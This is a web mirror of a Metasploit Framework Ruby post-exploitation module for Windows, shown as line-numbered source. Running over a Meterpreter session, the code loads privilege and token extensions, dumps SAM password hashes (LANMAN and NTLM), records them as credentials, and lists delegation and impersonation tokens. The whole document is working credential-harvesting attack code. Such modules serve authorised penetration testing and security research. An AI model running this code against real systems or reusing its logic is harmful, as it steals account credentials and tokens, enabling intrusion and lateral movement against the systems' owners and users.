Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/credentials/credential_collector.rb
19516 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Post
7
include Msf::Auxiliary::Report
8
9
def initialize(info = {})
10
super(
11
update_info(
12
info,
13
'Name' => 'Windows Gather Credential Collector',
14
'Description' => %q{
15
This module harvests credentials found on the host and stores them in the database.
16
},
17
'License' => MSF_LICENSE,
18
'Author' => [ 'tebo[at]attackresearch.com'],
19
'Platform' => [ 'win' ],
20
'SessionTypes' => [ 'meterpreter'],
21
'Notes' => {
22
'Stability' => [CRASH_SAFE],
23
'SideEffects' => [],
24
'Reliability' => []
25
},
26
'Compat' => {
27
'Meterpreter' => {
28
'Commands' => %w[
29
incognito_list_tokens
30
priv_passwd_get_sam_hashes
31
]
32
}
33
}
34
)
35
)
36
end
37
38
def run
39
hostname = sysinfo.nil? ? cmd_exec('hostname') : sysinfo['Computer']
40
print_status("Running module against #{hostname} (#{session.session_host})")
41
42
# Make sure we're rockin Priv and Incognito
43
session.core.use('priv') if !session.priv
44
session.core.use('incognito') if !session.incognito
45
46
# It wasn't me mom! Stinko did it!
47
begin
48
hashes = client.priv.sam_hashes
49
rescue StandardError
50
fail_with(Failure::Unknown, "Error accessing hashes, did you migrate to a process that matched the target's architecture?")
51
end
52
53
# Target infos for the db record
54
addr = session.session_host
55
# client.framework.db.report_host(:host => addr, :state => Msf::HostState::Alive)
56
57
# Record hashes to the running db instance
58
print_good('Collecting hashes...')
59
60
hashes.each do |hash|
61
# Build service information
62
service_data = {
63
address: addr,
64
port: 445,
65
service_name: 'smb',
66
protocol: 'tcp'
67
}
68
69
# Build credential information
70
credential_data = {
71
origin_type: :session,
72
session_id: session_db_id,
73
post_reference_name: refname,
74
private_type: :ntlm_hash,
75
private_data: hash.lanman + ':' + hash.ntlm,
76
username: hash.user_name,
77
workspace_id: myworkspace_id
78
}
79
80
credential_data.merge!(service_data)
81
credential_core = create_credential(credential_data)
82
83
# Assemble the options hash for creating the Metasploit::Credential::Login object
84
login_data = {
85
core: credential_core,
86
status: Metasploit::Model::Login::Status::UNTRIED,
87
workspace_id: myworkspace_id
88
}
89
90
login_data.merge!(service_data)
91
create_credential_login(login_data)
92
93
print_line " Extracted: #{credential_data[:username]}:#{credential_data[:private_data]}"
94
end
95
96
# Record user tokens
97
tokens = session.incognito.incognito_list_tokens(0)
98
raise Rex::Script::Completed if !tokens
99
100
# Meh, tokens come to us as a formatted string
101
print_good 'Collecting tokens...'
102
(tokens['delegation'] + tokens['impersonation']).split("\n").each do |token|
103
data = {}
104
data[:host] = addr
105
data[:type] = 'smb_token'
106
data[:data] = token
107
data[:update] = :unique_data
108
109
print_line " #{data[:data]}"
110
111
report_note(data)
112
end
113
end
114
end
115
116